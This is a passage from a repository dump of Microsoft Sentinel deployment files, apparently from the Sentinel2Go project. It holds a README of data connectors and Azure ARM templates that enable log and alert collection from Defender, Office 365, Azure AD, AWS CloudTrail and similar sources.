/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Terminal-Services.xml: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Terminal-Services.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/WMI.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/WMI.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Windows-Defender.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Windows-Defender.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Windows-Diagnostics.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Windows-Diagnostics.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Windows-Updates.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Windows-Updates.xml 
-------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Wireless.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Wireless.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Sentinel Data Connectors 2 | 3 | 4 | 5 | 6 |
7 | 8 | 9 | 10 |
11 |
12 | 13 | The Data Connectors currently deployed via ARM templates in this project are of type [Microsoft.OperationsManagement/solutions](https://docs.microsoft.com/en-us/azure/templates/microsoft.operationsmanagement/2015-11-01-preview/solutions) and [Microsoft.OperationalInsights/workspaces/dataSources](https://docs.microsoft.com/en-us/azure/templates/microsoft.operationalinsights/2015-11-01-preview/workspaces/datasources). 14 | 15 | 16 | | Display Name | Data Table | Type | Kind | 17 | |----|----|----|----| 18 | | [Amazon Web Services](https://docs.microsoft.com/en-us/azure/sentinel/connect-aws) | AWSCloudTrail | Data Connector | AmazonWebServicesCloudTrail | 19 | | [Azure Activity](https://docs.microsoft.com/en-us/azure/sentinel/connect-azure-activity) | AzureActivity | Data Source | AzureActivityLog | 20 | | [Azure Security Center](https://docs.microsoft.com/en-us/azure/sentinel/connect-azure-security-center) | SecurityAlert | Data Connector | AzureSecurityCenter | 21 | | [DNS (Preview)](https://docs.microsoft.com/en-us/azure/sentinel/connect-dns) | DnsEvents, DnsInventory | Solution | DnsAnalytics | 22 | | [Security Events](https://docs.microsoft.com/en-us/azure/sentinel/connect-windows-security-events) | SecurityEvent | Data Source | SecurityInsightsSecurityEventCollectionConfiguration | 23 | | [Windows Firewall](https://docs.microsoft.com/en-us/azure/sentinel/connect-windows-firewall) | WindowsFirewall | Solution | WindowsFirewall | 24 | | [Office 365](https://docs.microsoft.com/en-us/azure/sentinel/connect-office-365) | OfficeActivity | Data Connector | Office365 | 25 | | [Azure AD](https://docs.microsoft.com/en-us/azure/sentinel/connect-azure-active-directory) | SigninLogs, AuditLogs | Data Connector | AzureActiveDirectory | 26 | 27 | # References 28 | 29 | * https://docs.microsoft.com/en-us/azure/sentinel/connect-data-sources 30 | -------------------------------------------------------------------------------- 
/microsoft-sentinel/linkedtemplates/data-connectors/aatp.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "aatpAlerts": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "AATP alerts state" 19 | } 20 | }, 21 | "tenantId": { 22 | "type": "string", 23 | "metadata": { 24 | "description": "Tenant Id" 25 | } 26 | }, 27 | "location": { 28 | "type": "string", 29 | "defaultValue": "[resourceGroup().location]", 30 | "metadata": { 31 | "description": "Location for all resources." 32 | } 33 | } 34 | }, 35 | "resources": [ 36 | { 37 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 38 | "apiVersion": "2020-01-01", 39 | "location": "[parameters('location')]", 40 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',parameters('guidValue'))]", 41 | "kind": "AzureAdvancedThreatProtection", 42 | "properties": { 43 | "tenantId": "[parameters('tenantId')]", 44 | "dataTypes": { 45 | "alerts": { 46 | "state": "[parameters('aatpAlerts')]" 47 | } 48 | } 49 | } 50 | } 51 | ] 52 | } 53 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/awsCloudTrail.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": 
"string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "awsRoleArn": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "The AWS Role Amazon Resource Name (ARN) created with AWSCloudTrailReadOnlyAccess to access the Log Analytics workspace" 19 | } 20 | }, 21 | "location": { 22 | "type": "string", 23 | "defaultValue": "[resourceGroup().location]", 24 | "metadata": { 25 | "description": "Location for all resources." 26 | } 27 | } 28 | }, 29 | "resources": [ 30 | { 31 | "type": "Microsoft.SecurityInsights/dataConnectors", 32 | "apiVersion": "2020-01-01", 33 | "location": "[parameters('location')]", 34 | "name": "[concat(parameters('workspaceName'), concat('/',parameters('guidValue')))]", 35 | "kind": "AmazonWebServicesCloudTrail", 36 | "properties": { 37 | "awsRoleArn": "[parameters('awsRoleArn')]", 38 | "dataTypes": { 39 | "logs": { 40 | "state": "enabled" 41 | } 42 | } 43 | } 44 | } 45 | ] 46 | } 47 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/azureADDiagnosticSettings.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-08-01/tenantDeploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "resourceGroup": { 6 | "type": "string", 7 | "defaultValue": "", 8 | "metadata": { 9 | "description": "The resource group to deploy all the resources to" 10 | } 11 | }, 12 | "subscriptionId": { 13 | "type": "string", 14 | "defaultValue": "", 15 | "metadata": { 16 | "description": "The subscriptionId to deploy all the resources to" 17 | } 18 | }, 19 | "workspaceId": { 20 | "type": "string", 21 | "defaultValue": "", 22 | "metadata": { 23 | "description": "Your own existing log analytics workspace ID. Leave it empty if you are deploying a new LA workspace." 
24 | } 25 | }, 26 | "utcValue": { 27 | "type": "string", 28 | "metadata": { 29 | "description": "Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used" 30 | }, 31 | "defaultValue": "[utcNow()]" 32 | } 33 | }, 34 | "resources": [ 35 | { 36 | "type": "microsoft.aadiam/diagnosticSettings", 37 | "apiVersion": "2017-04-01", 38 | "name": "[concat('AADConnector-',uniqueString(parameters('subscriptionId'),parameters('resourceGroup'),parameters('utcValue')))]", 39 | "properties": { 40 | "workspaceId": "[if(empty(parameters('workspaceId')), concat('/subscriptions/', parameters('subscriptionId'), '/resourceGroups/', parameters('resourceGroup'), '/providers/microsoft.operationalinsights/workspaces/', reference('deployMSSentinel2Go').outputs.workspaceName.value), parameters('workspaceId'))]", 41 | "logs": [ 42 | { 43 | "category": "SignInLogs", 44 | "enabled": true 45 | }, 46 | { 47 | "category": "AuditLogs", 48 | "enabled": true 49 | }, 50 | { 51 | "category": "NonInteractiveUserSignInLogs", 52 | "enabled": true 53 | }, 54 | { 55 | "category": "ServicePrincipalSignInLogs", 56 | "enabled": true 57 | }, 58 | { 59 | "category": "ManagedIdentitySignInLogs", 60 | "enabled": true 61 | }, 62 | { 63 | "category": "ProvisioningLogs", 64 | "enabled": true 65 | } 66 | ], 67 | "metrics": [] 68 | } 69 | } 70 | ] 71 | } 72 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/azureADIdentityProtection.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log 
Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "tenantId": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "Tenand Id" 19 | } 20 | }, 21 | "createAADIdentityProtectionIncidents": { 22 | "type": "bool", 23 | "defaultValue": false, 24 | "metadata": { 25 | "description": "Create incidents automatically from all alerts generated in this connected service." 26 | } 27 | }, 28 | "location": { 29 | "type": "string", 30 | "defaultValue": "[resourceGroup().location]", 31 | "metadata": { 32 | "description": "Location for all resources." 33 | } 34 | } 35 | }, 36 | "variables": { 37 | "aadipName": "[concat('aadip', uniqueString(resourceGroup().id))]" 38 | }, 39 | "resources": [ 40 | { 41 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 42 | "apiVersion": "2020-01-01", 43 | "location": "[parameters('location')]", 44 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',variables('aadipName'))]", 45 | "kind": "AzureActiveDirectory", 46 | "properties": { 47 | "tenantId": "[parameters('tenantId')]", 48 | "dataTypes": { 49 | "alerts": { 50 | "state": "enabled" 51 | } 52 | } 53 | } 54 | }, 55 | { 56 | "condition": "[parameters('createAADIdentityProtectionIncidents')]", 57 | "type": "Microsoft.SecurityInsights/alertRules", 58 | "apiVersion": "2020-01-01", 59 | "location": "[parameters('location')]", 60 | "name": "[parameters('guidValue')]", 61 | "kind": "MicrosoftSecurityIncidentCreation", 62 | "properties": { 63 | "displayName": "Create incidents based on Azure Active Directory Identity Protection alerts", 64 | "description": "Create incidents based on all alerts generated in Azure Active Directory Identity Protection", 65 | "enabled": true, 66 | "productFilter": "Azure Active Directory Identity Protection" 67 | } 68 | } 69 | ] 70 | } 71 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/azureActivityLog.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "subscriptionId": { 12 | "type": "string", 13 | "defaultValue": "[subscription().subscriptionId]", 14 | "metadata": { 15 | "description": "Sbscription Id to monitor" 16 | } 17 | }, 18 | "location": { 19 | "type": "string", 20 | "defaultValue": "[resourceGroup().location]", 21 | "metadata": { 22 | "description": "Location for all resources." 23 | } 24 | } 25 | }, 26 | "resources": [ 27 | { 28 | "type": "Microsoft.OperationalInsights/workspaces/dataSources", 29 | "apiVersion": "2020-03-01-preview", 30 | "location": "[parameters('location')]", 31 | "name": "[concat(parameters('workspaceName'), concat('/',replace(parameters('subscriptionId'),'-', '')))]", 32 | "kind": "AzureActivityLog", 33 | "properties": { 34 | "linkedResourceId": "[concat('/subscriptions/', parameters('subscriptionId'), '/providers/microsoft.insights/eventtypes/management')]" 35 | } 36 | } 37 | ] 38 | } 39 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/azureSecurityCenter.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "subscriptionId": { 16 | "type": "string", 17 | "defaultValue": 
"[subscription().subscriptionId]", 18 | "metadata": { 19 | "description": "Sbscription Id to monitor" 20 | } 21 | }, 22 | "ascState": { 23 | "type": "string", 24 | "metadata": { 25 | "description": "ASC state" 26 | } 27 | }, 28 | "location": { 29 | "type": "string", 30 | "defaultValue": "[resourceGroup().location]", 31 | "metadata": { 32 | "description": "Location for all resources." 33 | } 34 | } 35 | }, 36 | "resources": [ 37 | { 38 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 39 | "apiVersion": "2020-01-01", 40 | "location": "[parameters('location')]", 41 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',parameters('guidValue'))]", 42 | "kind": "AzureSecurityCenter", 43 | "properties": { 44 | "subscriptionId": "[parameters('subscriptionId')]", 45 | "dataTypes": { 46 | "alerts": { 47 | "state": "[parameters('ascState')]" 48 | } 49 | } 50 | } 51 | } 52 | ] 53 | } 54 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/dnsAnalytics.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "workspaceId": { 12 | "type": "string", 13 | "metadata": { 14 | "description": "Log Analytics workspace ID" 15 | } 16 | }, 17 | "location": { 18 | "type": "string", 19 | "defaultValue": "[resourceGroup().location]", 20 | "metadata": { 21 | "description": "Location for all resources." 
22 | } 23 | } 24 | }, 25 | "resources": [ 26 | { 27 | "type": "Microsoft.OperationsManagement/solutions", 28 | "apiVersion": "2015-11-01-preview", 29 | "name": "[concat('DnsAnalytics','(', parameters('workspaceName'),')')]", 30 | "location": "[parameters('location')]", 31 | "plan": { 32 | "name": "[concat('DnsAnalytics','(', parameters('workspaceName'),')')]", 33 | "promotionCode": "", 34 | "product": "OMSGallery/DnsAnalytics", 35 | "publisher": "Microsoft" 36 | }, 37 | "properties": { 38 | "workspaceResourceId": "[parameters('workspaceId')]", 39 | "containedResources": [] 40 | } 41 | } 42 | ] 43 | } 44 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/m365defender.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "connectM365Incidents": { 12 | "type": "bool", 13 | "metadata": { 14 | "description": "Connect Microsoft 365 Defender​ incidents to your Microsoft Sentinel. Incidents will appear in the incidents queue" 15 | }, 16 | "defaultValue": true 17 | }, 18 | "tenantId": { 19 | "type": "string", 20 | "metadata": { 21 | "description": "Tenand Id" 22 | } 23 | }, 24 | "location": { 25 | "type": "string", 26 | "defaultValue": "[resourceGroup().location]", 27 | "metadata": { 28 | "description": "Location for all resources." 
29 | } 30 | } 31 | }, 32 | "variables": { 33 | "m365DefenderName": "[concat('m365defender', uniqueString(resourceGroup().id))]", 34 | "officeATPName": "[concat('oatp', uniqueString(resourceGroup().id))]", 35 | "mdatpName": "[concat('mdatp', uniqueString(resourceGroup().id))]", 36 | "aatpName": "[concat('aatp', uniqueString(resourceGroup().id))]", 37 | "mcasName": "[concat('mcas', uniqueString(resourceGroup().id))]" 38 | }, 39 | "resources": [ 40 | { 41 | "condition": "[parameters('connectM365Incidents')]", 42 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 43 | "apiVersion": "2020-01-01", 44 | "location": "[parameters('location')]", 45 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',variables('m365DefenderName'))]", 46 | "kind": "MicrosoftThreatProtection", 47 | "properties": { 48 | "tenantId": "[parameters('tenantId')]", 49 | "dataTypes": { 50 | "incidents": { 51 | "state": "enabled" 52 | }, 53 | "alerts": { 54 | "state": "enabled" 55 | } 56 | } 57 | } 58 | }, 59 | { 60 | "condition": "[parameters('connectM365Incidents')]", 61 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 62 | "apiVersion": "2019-01-01-preview", 63 | "location": "[parameters('location')]", 64 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',variables('mdatpName'))]", 65 | "kind": "MicrosoftDefenderAdvancedThreatProtection", 66 | "properties": { 67 | "tenantId": "[parameters('tenantId')]", 68 | "dataTypes": { 69 | "alerts": { 70 | "state": "enabled" 71 | } 72 | } 73 | } 74 | }, 75 | { 76 | "condition": "[parameters('connectM365Incidents')]", 77 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 78 | "apiVersion": "2019-01-01-preview", 79 | "location": "[parameters('location')]", 80 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',variables('officeATPName'))]", 81 | "kind": "OfficeATP", 82 | "properties": { 83 | 
"tenantId": "[parameters('tenantId')]", 84 | "dataTypes": { 85 | "alerts": { 86 | "state": "enabled" 87 | } 88 | } 89 | } 90 | }, 91 | { 92 | "condition": "[parameters('connectM365Incidents')]", 93 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 94 | "apiVersion": "2020-01-01", 95 | "location": "[parameters('location')]", 96 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',variables('aatpName'))]", 97 | "kind": "AzureAdvancedThreatProtection", 98 | "properties": { 99 | "tenantId": "[parameters('tenantId')]", 100 | "dataTypes": { 101 | "alerts": { 102 | "state": "enabled" 103 | } 104 | } 105 | } 106 | }, 107 | { 108 | "condition": "[parameters('connectM365Incidents')]", 109 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 110 | "apiVersion": "2020-01-01", 111 | "location": "[parameters('location')]", 112 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',variables('mcasName'))]", 113 | "kind": "MicrosoftCloudAppSecurity", 114 | "properties": { 115 | "tenantId": "[parameters('tenantId')]", 116 | "dataTypes": { 117 | "alerts": { 118 | "state": "enabled" 119 | }, 120 | "discoveryLogs": { 121 | "state": "enabled" 122 | } 123 | } 124 | } 125 | } 126 | ] 127 | } 128 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/m365defenderAPI.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "SentinelExportSettings-", 3 | "workspaceProperties": { 4 | "workspaceResourceId": "/subscriptions//providers/Microsoft.OperationalInsights/workspaces/" 5 | }, 6 | "logs": [ 7 | { 8 | "category": "AdvancedHunting-DeviceInfo", 9 | "enabled": true 10 | }, 11 | { 12 | "category": "AdvancedHunting-DeviceNetworkInfo", 13 | "enabled": true 14 | }, 15 | { 16 | "category": "AdvancedHunting-DeviceProcessEvents", 17 | "enabled": true 18 | }, 19 | { 20 | 
"category": "AdvancedHunting-DeviceNetworkEvents", 21 | "enabled": true 22 | }, 23 | { 24 | "category": "AdvancedHunting-DeviceFileEvents", 25 | "enabled": true 26 | }, 27 | { 28 | "category": "AdvancedHunting-DeviceRegistryEvents", 29 | "enabled": true 30 | }, 31 | { 32 | "category": "AdvancedHunting-DeviceLogonEvents", 33 | "enabled": true 34 | }, 35 | { 36 | "category": "AdvancedHunting-DeviceImageLoadEvents", 37 | "enabled": true 38 | }, 39 | { 40 | "category": "AdvancedHunting-DeviceEvents", 41 | "enabled": true 42 | }, 43 | { 44 | "category": "AdvancedHunting-DeviceFileCertificateInfo", 45 | "enabled": true 46 | } 47 | ] 48 | } 49 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/mcas.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "mcasAlerts": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "MCAS alerts state" 19 | } 20 | }, 21 | "mcasDiscoveryLogs": { 22 | "type": "string", 23 | "metadata": { 24 | "description": "MCAS discovery logs" 25 | } 26 | }, 27 | "tenantId": { 28 | "type": "string", 29 | "metadata": { 30 | "description": "Tenand Id" 31 | } 32 | }, 33 | "location": { 34 | "type": "string", 35 | "defaultValue": "[resourceGroup().location]", 36 | "metadata": { 37 | "description": "Location for all resources." 
38 | } 39 | } 40 | }, 41 | "resources": [ 42 | { 43 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 44 | "apiVersion": "2020-01-01", 45 | "location": "[parameters('location')]", 46 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',parameters('guidValue'))]", 47 | "kind": "MicrosoftCloudAppSecurity", 48 | "properties": { 49 | "tenantId": "[parameters('tenantId')]", 50 | "dataTypes": { 51 | "alerts": { 52 | "state": "[parameters('mcasAlerts')]" 53 | }, 54 | "discoveryLogs": { 55 | "state": "[parameters('mcasDiscoveryLogs')]" 56 | } 57 | } 58 | } 59 | } 60 | ] 61 | } 62 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/mdatp.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "mdatpAlerts": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "MDATP alerts state" 19 | } 20 | }, 21 | "tenantId": { 22 | "type": "string", 23 | "metadata": { 24 | "description": "Tenand Id" 25 | } 26 | }, 27 | "location": { 28 | "type": "string", 29 | "defaultValue": "[resourceGroup().location]", 30 | "metadata": { 31 | "description": "Location for all resources." 
32 | } 33 | } 34 | }, 35 | "resources": [ 36 | { 37 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 38 | "apiVersion": "2019-01-01-preview", 39 | "location": "[parameters('location')]", 40 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',parameters('guidValue'))]", 41 | "kind": "MicrosoftDefenderAdvancedThreatProtection", 42 | "properties": { 43 | "tenantId": "[parameters('tenantId')]", 44 | "dataTypes": { 45 | "alerts": { 46 | "state": "[parameters('mdatpAlerts')]" 47 | } 48 | } 49 | } 50 | } 51 | ] 52 | } 53 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/office365.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "exchangeState": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "Exchange state" 19 | } 20 | }, 21 | "sharePointState": { 22 | "type": "string", 23 | "metadata": { 24 | "description": "SharePoint state" 25 | } 26 | }, 27 | "teamsState": { 28 | "type": "string", 29 | "metadata": { 30 | "description": "Teams state" 31 | } 32 | }, 33 | "tenantId": { 34 | "type": "string", 35 | "metadata": { 36 | "description": "Tenand Id" 37 | } 38 | }, 39 | "location": { 40 | "type": "string", 41 | "defaultValue": "[resourceGroup().location]", 42 | "metadata": { 43 | "description": "Location for all resources." 
44 | } 45 | } 46 | }, 47 | "resources": [ 48 | { 49 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 50 | "apiVersion": "2020-01-01", 51 | "location": "[parameters('location')]", 52 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',parameters('guidValue'))]", 53 | "kind": "Office365", 54 | "properties": { 55 | "tenantId": "[parameters('tenantId')]", 56 | "dataTypes": { 57 | "exchange": { 58 | "state": "[parameters('exchangeState')]" 59 | }, 60 | "sharePoint": { 61 | "state": "[parameters('sharePointState')]" 62 | }, 63 | "teams": { 64 | "state": "[parameters('teamsState')]" 65 | } 66 | } 67 | } 68 | } 69 | ] 70 | } 71 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/officeATP.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "oatpAlerts": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "Oatp alerts state" 19 | } 20 | }, 21 | "tenantId": { 22 | "type": "string", 23 | "metadata": { 24 | "description": "Tenand Id" 25 | } 26 | }, 27 | "location": { 28 | "type": "string", 29 | "defaultValue": "[resourceGroup().location]", 30 | "metadata": { 31 | "description": "Location for all resources." 
32 | } 33 | } 34 | }, 35 | "resources": [ 36 | { 37 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 38 | "apiVersion": "2019-01-01-preview", 39 | "location": "[parameters('location')]", 40 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',parameters('guidValue'))]", 41 | "kind": "OfficeATP", 42 | "properties": { 43 | "tenantId": "[parameters('tenantId')]", 44 | "dataTypes": { 45 | "alerts": { 46 | "state": "[parameters('oatpAlerts')]" 47 | } 48 | } 49 | } 50 | } 51 | ] 52 | } 53 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/securityEvents.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "securityCollectionTier": { 12 | "type": "string", 13 | "allowedValues": [ 14 | "All", 15 | "Recommended", 16 | "Minimal", 17 | "None" 18 | ], 19 | "metadata": { 20 | "description": "Tier for gathering Windows Security Events." 21 | } 22 | }, 23 | "location": { 24 | "type": "string", 25 | "defaultValue": "[resourceGroup().location]", 26 | "metadata": { 27 | "description": "Location for all resources." 
28 | } 29 | } 30 | }, 31 | "resources": [ 32 | { 33 | "type": "Microsoft.OperationalInsights/workspaces/dataSources", 34 | "apiVersion": "2020-03-01-preview", 35 | "location": "[parameters('location')]", 36 | "name": "[concat(parameters('workspaceName'), '/SecurityInsightsSecurityEventCollectionConfiguration')]", 37 | "kind": "SecurityInsightsSecurityEventCollectionConfiguration", 38 | "properties": { 39 | "tier": "[parameters('securityCollectionTier')]", 40 | "tierSetMethod": "Custom" 41 | } 42 | } 43 | ] 44 | } 45 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/syslogCollection.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "location": { 12 | "type": "string", 13 | "defaultValue": "[resourceGroup().location]", 14 | "metadata": { 15 | "description": "Location for all resources." 
